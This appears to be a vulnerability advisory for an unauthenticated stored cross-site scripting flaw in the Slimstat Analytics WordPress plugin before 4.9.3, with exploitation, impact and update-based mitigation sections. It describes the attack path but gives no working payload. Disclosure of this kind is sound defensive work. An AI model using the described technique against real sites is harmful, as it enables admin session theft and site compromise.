Slimstat Analytics < 4.9.3 - Unauthenticated Stored XSS

Vulnerability

The Slimstat Analytics WordPress plugin versions before 4.9.3 do not sanitize or escape the URI when logging HTTP requests. This allows unauthenticated attackers to inject arbitrary JavaScript into the URI, which is stored in the plugin's request logs. The vulnerability affects any site running a version prior to 4.9.3 [1].

Exploitation

An unauthenticated attacker can craft a request containing a malicious payload in the URI (e.g., a `` tag). When a logged-in administrator views the request logs within the WordPress admin panel, the stored payload executes in the admin's browser. No authentication or special privileges are required for the attacker; the only user interaction needed is the admin accessing the logs [1].

Impact

Successful exploitation results in Stored Cross-Site Scripting (XSS) in the context of the admin's session. An attacker can steal session cookies, perform malicious actions on behalf of the admin, or deface the admin interface. The impact is limited to administrator sessions, but full site compromise is possible if an admin's privileges are abused [1].

Mitigation

Update to Slimstat Analytics version 4.9.3 or later, which fixes the issue by properly sanitizing and escaping the URI before logging. The fix was released on or before 2022-12-19 [1]. No workarounds are documented; applying the update is the recommended mitigation.